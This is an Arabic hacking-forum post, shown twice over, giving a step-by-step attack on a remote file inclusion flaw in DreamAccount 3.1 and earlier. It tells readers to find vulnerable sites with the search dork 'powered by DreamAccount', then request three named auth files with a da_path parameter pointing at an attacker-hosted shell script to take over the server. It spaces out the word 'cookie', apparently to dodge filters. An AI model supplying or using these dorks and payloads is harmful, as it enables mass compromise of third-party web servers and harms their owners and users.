AG-Spider
05-06-2006, 10:25
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
DreamAccount <= 3.1 - Remote File Include Vulnerability
ثغرة فايل انكلودز تمكنك من رف شيل ثم اختراق السيرفر
الملفات المصابة هنا
auth.c o o k i e.inc.php
auth.header.inc.php
auth.sessions.inc.php
افتح اي محرك بحث وليكن ياهوو
"powered by DreamAccount"
http://spider.5gigs.com/explo/Dream/1.jpg
اختر اي موقع من المواقع المصابة
http://spider.5gigs.com/explo/Dream/2.jpg
[path]/auth.c o o k i e.inc.php?da_path=http://www.yourspace.com/yourscript.php?
[path]/auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php?
[path]/auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php?
http://spider.5gigs.com/explo/Dream/3.jpg
ضع هنا بدل http://www.yourspace.com/yourscript.php
رابط الشيل
وال path هنا هي مسار الثغرة
>> احذف المسافات من كلمة c o o k i e
ومبروك عليك
تحياتي للجميع
AG-Spider
جميع حقوق الشرح محفوظة لقراصنة الموت
السلام عليكم ورحمة الله وبركاته
DreamAccount <= 3.1 - Remote File Include Vulnerability
ثغرة فايل انكلودز تمكنك من رف شيل ثم اختراق السيرفر
الملفات المصابة هنا
auth.c o o k i e.inc.php
auth.header.inc.php
auth.sessions.inc.php
افتح اي محرك بحث وليكن ياهوو
"powered by DreamAccount"
http://spider.5gigs.com/explo/Dream/1.jpg
اختر اي موقع من المواقع المصابة
http://spider.5gigs.com/explo/Dream/2.jpg
[path]/auth.c o o k i e.inc.php?da_path=http://www.yourspace.com/yourscript.php?
[path]/auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php?
[path]/auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php?
http://spider.5gigs.com/explo/Dream/3.jpg
ضع هنا بدل http://www.yourspace.com/yourscript.php
رابط الشيل
وال path هنا هي مسار الثغرة
>> احذف المسافات من كلمة c o o k i e
ومبروك عليك
تحياتي للجميع
AG-Spider
جميع حقوق الشرح محفوظة لقراصنة الموت